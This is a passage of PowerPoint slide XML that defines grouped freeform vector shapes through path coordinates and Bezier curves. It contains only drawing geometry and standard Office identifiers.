                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79CF25B-A309-488D-889D-FD61AF0F4E1A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6021387" y="2133600"/>
                <a:ext cx="150813" cy="457200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 600"/>
                  <a:gd name="T1" fmla="*/ 161 h 1817"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1817"/>
                  <a:gd name="T4" fmla="*/ 600 w 600"/>
                  <a:gd name="T5" fmla="*/ 1656 h 1817"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 0 h 1817"/>
                  <a:gd name="T8" fmla="*/ 0 w 600"/>
                  <a:gd name="T9" fmla="*/ 161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0" h="1817">
                    <a:moveTo>
                      <a:pt x="0" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161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3" name="Freeform 912">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF8A7CB-27EF-462B-93B0-8BFFAC253C26}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5870574" y="2092325"/>
                <a:ext cx="150813" cy="458788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 600 w 600"/>
                  <a:gd name="T1" fmla="*/ 0 h 1819"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 163 h 1819"/>
                  <a:gd name="T4" fmla="*/ 0 w 600"/>
                  <a:gd name="T5" fmla="*/ 1819 h 1819"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 1656 h 1819"/>
                  <a:gd name="T8" fmla="*/ 600 w 600"/>
                  <a:gd name="T9" fmla="*/ 0 h 18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0" h="1819">
                    <a:moveTo>
                      <a:pt x="600" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0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667" name="Group 940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A868E503-951D-4A1A-9F62-F3DBE88565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85039" y="1036692"/>
              <a:ext cx="1515489" cy="808853"/>
              <a:chOff x="3385" y="1157"/>
              <a:chExt cx="1023" cy="546"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="798" name="Freeform 827">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13D0414-381A-4E15-A40A-CA2FA608401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09" y="1613"/>
                <a:ext cx="215" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 936 w 936"/>
                  <a:gd name="T1" fmla="*/ 235 h 245"/>
                  <a:gd name="T2" fmla="*/ 902 w 936"/>
                  <a:gd name="T3" fmla="*/ 234 h 245"/>
                  <a:gd name="T4" fmla="*/ 19 w 936"/>
                  <a:gd name="T5" fmla="*/ 0 h 245"/>
                  <a:gd name="T6" fmla="*/ 0 w 936"/>
                  <a:gd name="T7" fmla="*/ 5 h 245"/>
                  <a:gd name="T8" fmla="*/ 883 w 936"/>
                  <a:gd name="T9" fmla="*/ 239 h 245"/>
                  <a:gd name="T10" fmla="*/ 936 w 936"/>
                  <a:gd name="T11" fmla="*/ 23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36" h="245">
                    <a:moveTo>
                      <a:pt x="936" y="235"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="916" y="238"/>
                      <a:pt x="902" y="234"/>
                      <a:pt x="902" y="234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852" y="230"/>
                      <a:pt x="883" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="906" y="245"/>
                      <a:pt x="917" y="243"/>
                      <a:pt x="936" y="2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9" name="Freeform 828">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1291FEDE-5958-4ECA-A0F5-1813B6677A9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09" y="1614"/>
                <a:ext cx="224" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 952 w 974"/>
                  <a:gd name="T1" fmla="*/ 225 h 253"/>
                  <a:gd name="T2" fmla="*/ 883 w 974"/>
                  <a:gd name="T3" fmla="*/ 234 h 253"/>
                  <a:gd name="T4" fmla="*/ 0 w 974"/>
                  <a:gd name="T5" fmla="*/ 0 h 253"/>
                  <a:gd name="T6" fmla="*/ 0 w 974"/>
                  <a:gd name="T7" fmla="*/ 15 h 253"/>
                  <a:gd name="T8" fmla="*/ 883 w 974"/>
                  <a:gd name="T9" fmla="*/ 250 h 253"/>
                  <a:gd name="T10" fmla="*/ 914 w 974"/>
                  <a:gd name="T11" fmla="*/ 251 h 253"/>
                  <a:gd name="T12" fmla="*/ 974 w 974"/>
                  <a:gd name="T13" fmla="*/ 231 h 253"/>
                  <a:gd name="T14" fmla="*/ 974 w 974"/>
                  <a:gd name="T15" fmla="*/ 228 h 253"/>
                  <a:gd name="T16" fmla="*/ 974 w 974"/>
                  <a:gd name="T17" fmla="*/ 220 h 253"/>
                  <a:gd name="T18" fmla="*/ 974 w 974"/>
                  <a:gd name="T19" fmla="*/ 214 h 253"/>
                  <a:gd name="T20" fmla="*/ 952 w 974"/>
                  <a:gd name="T21" fmla="*/ 225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74" h="253">
                    <a:moveTo>
                      <a:pt x="952" y="225"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="232"/>
                      <a:pt x="906" y="240"/>
                      <a:pt x="883" y="23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869" y="247"/>
                      <a:pt x="883" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="892" y="253"/>
                      <a:pt x="903" y="253"/>
                      <a:pt x="914" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="937" y="248"/>
                      <a:pt x="963" y="238"/>
                      <a:pt x="974" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="228"/>
                      <a:pt x="974" y="228"/>
                      <a:pt x="974" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="220"/>
                      <a:pt x="974" y="220"/>
                      <a:pt x="974" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="214"/>
                      <a:pt x="974" y="214"/>
                      <a:pt x="974" y="214"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="214"/>
                      <a:pt x="965" y="219"/>
                      <a:pt x="952" y="2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0" name="Freeform 829">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5A6823-83BF-45F5-8514-029CD2288DE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19" y="1666"/>
                <a:ext cx="18" cy="6"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 25 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 79"/>
                  <a:gd name="T3" fmla="*/ 25 h 25"/>
                  <a:gd name="T4" fmla="*/ 79 w 79"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 60 w 79"/>
                  <a:gd name="T7" fmla="*/ 5 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 79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25">
                    <a:moveTo>
                      <a:pt x="0" y="25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39" y="23"/>
                      <a:pt x="79" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="5"/>
                      <a:pt x="60" y="5"/>
                      <a:pt x="60" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="12"/>
                      <a:pt x="23" y="22"/>
                      <a:pt x="0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1" name="Freeform 830">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9B0171-DB71-4C0C-9BF0-E4DA0E9CA4B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33" y="1662"/>
                <a:ext cx="4" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 12 h 52"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 45"/>
                  <a:gd name="T5" fmla="*/ 45 h 52"/>
                  <a:gd name="T6" fmla="*/ 0 w 45"/>
                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                  <a:gd name="T8" fmla="*/ 45 w 45"/>
                  <a:gd name="T9" fmla="*/ 40 h 52"/>
                  <a:gd name="T10" fmla="*/ 45 w 45"/>
                  <a:gd name="T11" fmla="*/ 0 h 52"/>
                  <a:gd name="T12" fmla="*/ 0 w 45"/>
                  <a:gd name="T13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52">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45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2" name="Freeform 831">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1AFD48-819D-4C5A-8FE5-ADFF2C36BFD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96" y="1617"/>
                <a:ext cx="5" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 48 h 48"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 12 h 48"/>
                  <a:gd name="T4" fmla="*/ 45 w 45"/>
                  <a:gd name="T5" fmla="*/ 0 h 48"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 36 h 48"/>
                  <a:gd name="T8" fmla="*/ 0 w 45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48">
                    <a:moveTo>
                      <a:pt x="0" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="36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3" name="Freeform 832">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28735463-6AB8-49F1-BAA5-76F3D1A7484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13" y="1569"/>
                <a:ext cx="183" cy="53"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 795"/>
                  <a:gd name="T1" fmla="*/ 0 h 228"/>
                  <a:gd name="T2" fmla="*/ 0 w 795"/>
                  <a:gd name="T3" fmla="*/ 14 h 228"/>
                  <a:gd name="T4" fmla="*/ 795 w 795"/>
                  <a:gd name="T5" fmla="*/ 228 h 228"/>
                  <a:gd name="T6" fmla="*/ 795 w 795"/>
                  <a:gd name="T7" fmla="*/ 213 h 228"/>
                  <a:gd name="T8" fmla="*/ 0 w 795"/>
                  <a:gd name="T9" fmla="*/ 0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5" h="228">
                    <a:moveTo>
                      <a:pt x="0" y="0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710" y="205"/>
                      <a:pt x="795" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="19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4" name="Freeform 833">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8385E8AB-FEC5-4B3E-9D23-847DFA51B9A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13" y="1568"/>
                <a:ext cx="188" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 1923"/>
                  <a:gd name="T1" fmla="*/ 0 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 1923"/>
                  <a:gd name="T3" fmla="*/ 12 h 515"/>
                  <a:gd name="T4" fmla="*/ 1878 w 1923"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 1923 w 1923"/>
                  <a:gd name="T7" fmla="*/ 503 h 515"/>
                  <a:gd name="T8" fmla="*/ 45 w 1923"/>
                  <a:gd name="T9" fmla="*/ 0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23" h="515">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1878" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1923" y="503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5" name="Freeform 834">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC243F4A-F013-4B20-A438-33BE4FEDC12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201" y="1637"/>
                <a:ext cx="5" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 47 h 47"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 12 h 47"/>
                  <a:gd name="T4" fmla="*/ 45 w 45"/>
                  <a:gd name="T5" fmla="*/ 0 h 47"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 35 h 47"/>
                  <a:gd name="T8" fmla="*/ 0 w 45"/>
                  <a:gd name="T9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47">
                    <a:moveTo>
                      <a:pt x="0" y="47"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35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6" name="Freeform 835">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AC96BD-A6D9-44B5-B202-6DF0F30DB61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18" y="1589"/>
                <a:ext cx="183" cy="53"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 795"/>
                  <a:gd name="T1" fmla="*/ 0 h 228"/>
                  <a:gd name="T2" fmla="*/ 0 w 795"/>
                  <a:gd name="T3" fmla="*/ 14 h 228"/>
                  <a:gd name="T4" fmla="*/ 795 w 795"/>
                  <a:gd name="T5" fmla="*/ 228 h 228"/>
                  <a:gd name="T6" fmla="*/ 795 w 795"/>
                  <a:gd name="T7" fmla="*/ 213 h 228"/>
                  <a:gd name="T8" fmla="*/ 0 w 795"/>
                  <a:gd name="T9" fmla="*/ 0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5" h="228">
                    <a:moveTo>
                      <a:pt x="0" y="0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710" y="205"/>
                      <a:pt x="795" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="19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7" name="Freeform 836">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7242ED6B-AFE6-4B48-B008-281892F6377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18" y="1588"/>
                <a:ext cx="188" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 1923"/>
                  <a:gd name="T1" fmla="*/ 0 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 1923"/>
                  <a:gd name="T3" fmla="*/ 12 h 515"/>
                  <a:gd name="T4" fmla="*/ 1878 w 1923"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 1923 w 1923"/>
                  <a:gd name="T7" fmla="*/ 503 h 515"/>
                  <a:gd name="T8" fmla="*/ 45 w 1923"/>
                  <a:gd name="T9" fmla="*/ 0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23" h="515">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1878" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1923" y="503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8" name="Freeform 837">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2008FF9F-8737-4702-9FC6-003BD460434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86" y="1643"/>
                <a:ext cx="215" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 936 w 936"/>
                  <a:gd name="T1" fmla="*/ 236 h 246"/>
                  <a:gd name="T2" fmla="*/ 903 w 936"/>
                  <a:gd name="T3" fmla="*/ 234 h 246"/>
                  <a:gd name="T4" fmla="*/ 19 w 936"/>
                  <a:gd name="T5" fmla="*/ 0 h 246"/>
                  <a:gd name="T6" fmla="*/ 0 w 936"/>
                  <a:gd name="T7" fmla="*/ 5 h 246"/>
                  <a:gd name="T8" fmla="*/ 884 w 936"/>
                  <a:gd name="T9" fmla="*/ 239 h 246"/>
                  <a:gd name="T10" fmla="*/ 936 w 936"/>
                  <a:gd name="T11" fmla="*/ 23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36" h="246">
                    <a:moveTo>
                      <a:pt x="936" y="236"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="916" y="238"/>
                      <a:pt x="903" y="234"/>
                      <a:pt x="903" y="234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853" y="231"/>
                      <a:pt x="884" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="906" y="246"/>
                      <a:pt x="918" y="243"/>
                      <a:pt x="936" y="23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9" name="Freeform 838">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32104867-D650-48FC-B377-CC506026A78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86" y="1644"/>
                <a:ext cx="224" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 952 w 974"/>
                  <a:gd name="T1" fmla="*/ 225 h 254"/>
                  <a:gd name="T2" fmla="*/ 884 w 974"/>
                  <a:gd name="T3" fmla="*/ 234 h 254"/>
                  <a:gd name="T4" fmla="*/ 0 w 974"/>
                  <a:gd name="T5" fmla="*/ 0 h 254"/>
                  <a:gd name="T6" fmla="*/ 0 w 974"/>
                  <a:gd name="T7" fmla="*/ 15 h 254"/>
                  <a:gd name="T8" fmla="*/ 884 w 974"/>
                  <a:gd name="T9" fmla="*/ 251 h 254"/>
                  <a:gd name="T10" fmla="*/ 914 w 974"/>
                  <a:gd name="T11" fmla="*/ 252 h 254"/>
                  <a:gd name="T12" fmla="*/ 974 w 974"/>
                  <a:gd name="T13" fmla="*/ 232 h 254"/>
                  <a:gd name="T14" fmla="*/ 974 w 974"/>
                  <a:gd name="T15" fmla="*/ 229 h 254"/>
                  <a:gd name="T16" fmla="*/ 974 w 974"/>
                  <a:gd name="T17" fmla="*/ 221 h 254"/>
                  <a:gd name="T18" fmla="*/ 974 w 974"/>
                  <a:gd name="T19" fmla="*/ 215 h 254"/>
                  <a:gd name="T20" fmla="*/ 952 w 974"/>
                  <a:gd name="T21" fmla="*/ 225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74" h="254">
                    <a:moveTo>
                      <a:pt x="952" y="225"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="233"/>
                      <a:pt x="906" y="241"/>
                      <a:pt x="884" y="23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870" y="247"/>
                      <a:pt x="884" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="892" y="254"/>
                      <a:pt x="903" y="253"/>
                      <a:pt x="914" y="252"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="938" y="248"/>
                      <a:pt x="963" y="238"/>
                      <a:pt x="974" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="229"/>
                      <a:pt x="974" y="229"/>
                      <a:pt x="974" y="229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="221"/>
                      <a:pt x="974" y="221"/>
                      <a:pt x="974" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="215"/>
                      <a:pt x="974" y="215"/>
                      <a:pt x="974" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="215"/>
                      <a:pt x="965" y="220"/>
                      <a:pt x="952" y="2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0" name="Freeform 839">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F939698-456D-49E9-8EB0-B4AE2729254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96" y="1696"/>
                <a:ext cx="19" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 79"/>
                  <a:gd name="T3" fmla="*/ 26 h 26"/>
                  <a:gd name="T4" fmla="*/ 79 w 79"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 60 w 79"/>
                  <a:gd name="T7" fmla="*/ 6 h 26"/>
                  <a:gd name="T8" fmla="*/ 0 w 7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26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39" y="23"/>
                      <a:pt x="79" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="6"/>
                      <a:pt x="60" y="6"/>
                      <a:pt x="60" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="12"/>
                      <a:pt x="24" y="22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1" name="Freeform 840">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96CCBAC5-6C83-474F-93CA-E0FC3E10DC5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10" y="1693"/>
                <a:ext cx="5" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 11 h 52"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 45"/>
                  <a:gd name="T5" fmla="*/ 45 h 52"/>
                  <a:gd name="T6" fmla="*/ 0 w 45"/>
                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                  <a:gd name="T8" fmla="*/ 45 w 45"/>
                  <a:gd name="T9" fmla="*/ 37 h 52"/>
                  <a:gd name="T10" fmla="*/ 45 w 45"/>
                  <a:gd name="T11" fmla="*/ 0 h 52"/>
                  <a:gd name="T12" fmla="*/ 0 w 45"/>
                  <a:gd name="T13" fmla="*/ 1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52">
                    <a:moveTo>
                      <a:pt x="0" y="11"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0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2" name="Freeform 841">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{115C9DAC-91A7-4ED8-A21A-16FF770FFCE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54" y="1595"/>
                <a:ext cx="97" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 242 w 421"/>
                  <a:gd name="T1" fmla="*/ 43 h 412"/>
                  <a:gd name="T2" fmla="*/ 350 w 421"/>
                  <a:gd name="T3" fmla="*/ 17 h 412"/>
                  <a:gd name="T4" fmla="*/ 421 w 421"/>
                  <a:gd name="T5" fmla="*/ 12 h 412"/>
                  <a:gd name="T6" fmla="*/ 324 w 421"/>
                  <a:gd name="T7" fmla="*/ 10 h 412"/>
                  <a:gd name="T8" fmla="*/ 216 w 421"/>
                  <a:gd name="T9" fmla="*/ 36 h 412"/>
                  <a:gd name="T10" fmla="*/ 2 w 421"/>
                  <a:gd name="T11" fmla="*/ 409 h 412"/>
                  <a:gd name="T12" fmla="*/ 13 w 421"/>
                  <a:gd name="T13" fmla="*/ 412 h 412"/>
                  <a:gd name="T14" fmla="*/ 242 w 421"/>
                  <a:gd name="T15" fmla="*/ 43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1" h="412">
                    <a:moveTo>
                      <a:pt x="242" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="350" y="17"/>
                      <a:pt x="350" y="17"/>
                      <a:pt x="350" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="377" y="10"/>
                      <a:pt x="401" y="9"/>
                      <a:pt x="421" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="2"/>
                      <a:pt x="363" y="0"/>
                      <a:pt x="324" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="36"/>
                      <a:pt x="216" y="36"/>
                      <a:pt x="216" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="95"/>
                      <a:pt x="2" y="409"/>
                      <a:pt x="2" y="409"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="412"/>
                      <a:pt x="13" y="412"/>
                      <a:pt x="13" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="412"/>
                      <a:pt x="26" y="102"/>
                      <a:pt x="242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3" name="Freeform 842">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374FA1A9-72F1-492D-B976-23199287778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142" y="1598"/>
                <a:ext cx="39" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 166"/>
                  <a:gd name="T1" fmla="*/ 7 h 261"/>
                  <a:gd name="T2" fmla="*/ 132 w 166"/>
                  <a:gd name="T3" fmla="*/ 258 h 261"/>
                  <a:gd name="T4" fmla="*/ 145 w 166"/>
                  <a:gd name="T5" fmla="*/ 261 h 261"/>
                  <a:gd name="T6" fmla="*/ 0 w 166"/>
                  <a:gd name="T7" fmla="*/ 7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6" h="261">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="28"/>
                      <a:pt x="132" y="258"/>
                      <a:pt x="132" y="258"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="261"/>
                      <a:pt x="145" y="261"/>
                      <a:pt x="145" y="261"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="261"/>
                      <a:pt x="166" y="0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4" name="Freeform 843">
                <a:extLst>
